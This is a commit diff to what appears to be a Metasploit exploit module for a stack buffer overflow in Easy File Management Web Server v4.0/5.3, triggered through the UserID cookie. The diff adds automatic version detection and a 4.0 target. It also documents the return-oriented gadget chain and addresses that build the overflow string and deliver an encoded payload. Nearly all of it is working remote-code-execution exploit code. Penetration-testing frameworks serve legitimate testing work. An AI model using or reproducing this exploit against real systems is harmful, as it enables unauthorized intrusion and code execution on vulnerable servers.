Added target 4.0 and cleaned up exploit

modules/exploits/windows/http/efs_fmws_userid_bof.rb

@@ -12,12 +12,16 @@ class Metasploit3 < Msf::Exploit::Remote
 
   def initialize(info = {})
     super(update_info(info,
-      'Name'           => 'Easy File Management Web Server v5.3 Stack Buffer Overflow',
+      'Name'           => 'Easy File Management Web Server v4.0/5.3 Stack Buffer Overflow',
       'Description'    => %q{
           Easy File Management Web Server contains a stack buffer overflow
         condition that is triggered as user-supplied input is not properly
-        validated when handling the User ID cookie. This may allow a remote
+        validated when handling the UserID cookie. This may allow a remote
         attacker to execute arbitrary code.
+
+        This version exploits:
+        Easy File Management Web Server v4.0
+        Easy File Management Web Server v5.3
       },
       'Author'         =>
         [
@@ -48,12 +52,17 @@ class Metasploit3 < Msf::Exploit::Remote
         },
       'Targets'        =>
         [
-          # Successfully tested efmws.exe (5.3.0.0) on:
+          # Successfully tested efmws.exe (4.0.0.0) / (5.3.0.0) on:
           # -- Microsoft Windows XP [Version 5.1.2600]
           # -- Microsoft Windows    [Version 6.1.7600]
           # -- Microsoft Windows    [Version 6.3.9600]
-          [ 'efmws 5.3 Windows Universal', { 'Ret' => 0x10010101 } ]
-          # PPR from ImageLoad.dll
+          ['Automatic Targeting', { 'auto' => true }],
+          ['Efmws 5.3 Universal', { 'Esp' => 0xA445ABCF, 'Ret' => 0x10010101 }],
+          ['Efmws 4.0 Universal', { 'Esp' => 0xA4518472, 'Ret' => 0x10010101 }],
+          # 0x10010101 = pop ebx > pop ecx > retn
+          # 0xA445ABCF = 0x514CF5 push esp > retn 0c
+          # 0xA4518472 = 0x457452 jmp esp
+          # From ImageLoad.dll
         ],
       'DisclosureDate' => 'May 20 2014',
       'DefaultTarget'  => 0))
@@ -64,26 +73,40 @@ class Metasploit3 < Msf::Exploit::Remote
         ], self.class)
   end
 
-  def check
+  def get_version
 
     #
     # NOTE: Version 5.3 still reports "4.0" in the "Server" header
     #
 
+    #if target.name =~ /Automatic/
     res = send_request_raw 'uri' => '/whatsnew.txt'
-    unless res
+    if res and res.body =~ /What's new in Easy File Management Web Server V(\d\.\d)/
+      version = $1
+      vprint_status "#{peer} - Found version: #{version}"
+      return version
+    elsif res.headers['server'] =~ /Easy File Management Web Server v(4\.0)/
+      version = $1
+      vprint_status "#{peer} - Based on Server header: #{version}"
+      return version
+    else
+      fail_with(Failure::NoTarget, "#{peer} - Unable to automatically detect a target")
+    end
+    #end
+  end
+
+  def check
+
+    version = get_version
+    unless version
       vprint_status "#{peer} - No response to request"
       return Exploit::CheckCode::Unknown
     end
-    if res.body =~ /What's new in Easy File Management Web Server V(\d\.\d)/
-      version = "#{$1}"
-      vprint_status "#{peer} - Found version: #{version}"
-      if version == "5.3"
-        return Exploit::CheckCode::Appears
-      end
+    if version == "5.3"
+      return Exploit::CheckCode::Appears
     end
-    if res.headers['server'] =~ /Easy File Management Web Server v(4\.0)/
-      return Exploit::CheckCode::Detected
+    if version == "4.0"
+      return Exploit::CheckCode::Appears
     end
     Exploit::CheckCode::Safe
   end
@@ -91,29 +114,42 @@ class Metasploit3 < Msf::Exploit::Remote
   def exploit
 
     #
-    # Check if target doesn't appear to be vulnerable, if so exit
-    # NOTE: if reported as detected continue incase whatsnew.txt is not reachable
+    # Get target version to determine how to reach call/jmp esp
     #
 
-    unless check == Exploit::CheckCode::Appears || Exploit::CheckCode::Detected
-      fail_with(Failure::NoTarget, "#{peer} - Target does not appear to be running fmws 5.3")
+    if target.name =~ /Automatic/
+      version = get_version
+      if version =~ /5\.3/
+        my_target = targets[1]
+      else version =~ /4\.0/
+        my_target = targets[2]
+      end
+    else
+      my_target = target
     end
 
     #
-    # Fu to JMP ESP where payload lives
-    # NOTE: Opcode 'JMP ESP' only existed in V5.3
+    # Check if target appears to be vulnerable, if not exit
     #
 
-    sploit =  rand_text(80)
-    sploit << [0x1001D8C8].pack("V")
-    sploit << rand_text(280)
-    sploit << [target.ret].pack("V")
-    sploit << [0xA445ABCF].pack("V")
-    sploit << [0x10010125].pack("V")
-    sploit << [0x10022AAC].pack("V")
-    sploit << rand_text(8)
-    sploit << [0x1001A187].pack("V")
-    sploit << [0x1002466D].pack("V")
+    unless check == Exploit::CheckCode::Appears || check == Exploit::CheckCode::Detected
+      fail_with(Failure::NoTarget, "#{peer} - Target does not appear to be running fmws v4.0/5.3")
+    end
+
+    #
+    # Fu to reach where payload lives
+    #
+
+    sploit =  rand_text(80)                # Junk
+    sploit << [0x1001D8C8].pack("V")       # Push edx
+    sploit << rand_text(280)               # Junk
+    sploit << [my_target.ret].pack("V")    # Pop ebx > pop ecx > retn
+    sploit << [my_target['Esp']].pack("V") # Setup call/jmp esp
+    sploit << [0x10010125].pack("V")       # Contains 00000000 to pass the jnz instruction
+    sploit << [0x10022AAC].pack("V")       # Mov eax,ebx > pop esi > pop ebx > retn
+    sploit << rand_text(8)                 # Filler
+    sploit << [0x1001A187].pack("V")       # Add eax,5bffc883 > retn
+    sploit << [0x1002466D].pack("V")       # Push eax > retn
     sploit << payload.encoded
 
     print_status "#{peer} - Trying target #{target.name}..."
@@ -125,7 +161,7 @@ class Metasploit3 < Msf::Exploit::Remote
     send_request_cgi({
       'uri'    => normalize_uri(target_uri.path),
       'cookie' => "SESSIONID=; UserID=#{sploit}; PassWD=;",
-    }, 5)
+    }, 1)
 
   end
 end